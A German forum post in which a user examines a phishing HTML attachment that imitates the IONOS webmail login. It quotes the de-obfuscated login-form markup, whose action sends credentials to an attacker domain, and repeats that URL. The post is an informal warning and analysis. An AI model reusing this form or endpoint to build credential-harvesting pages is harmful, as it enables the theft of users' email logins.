Ich hatte diese Mails auch bekommen und hatte bei ionos angerufen und Bescheid gesagt.
Die wussten das bereits; meinte zum Support, dass sie doch mal im Login-Bereich einen Info-Teil
für so etwas anlegen könnten, dass man darüber informiert werden kann usw.
Habe eben mal in diese html-Datei im Mail-Anhang mit BBEdit reingeschaut.
Da ist ein "unescape"-javascript drin und auch eine Art Keylogger mit javascript für den vermeintlichen Login-Button des Anhangs.
Gerade mal das elend lange javascript "escaped" – man logged sich dann quasi da ein; oder die Anmelde-Daten gehen dorthin:
HTML:
<form id="login-form" class="form content-elem"
action="https://email-businessionos.su/ionos/api.php" method="post" >
<legend class="hidden" data-i18n="oao.login.heading" data-i18n-attr="text">Webmail Login</legend>
Diese html-Datei einfach nur im Browser aufzurufen, sollte imo nichts gravierendes passieren (mit macOS) –
wenn man den Login dort nicht benutzt, weil sonst eine Application von folgender Adresse geladen wird:
Code:
https://email-businessionos.su/ionos/api.php
…und das könnte dann evtl. etwas "ungeil" sein.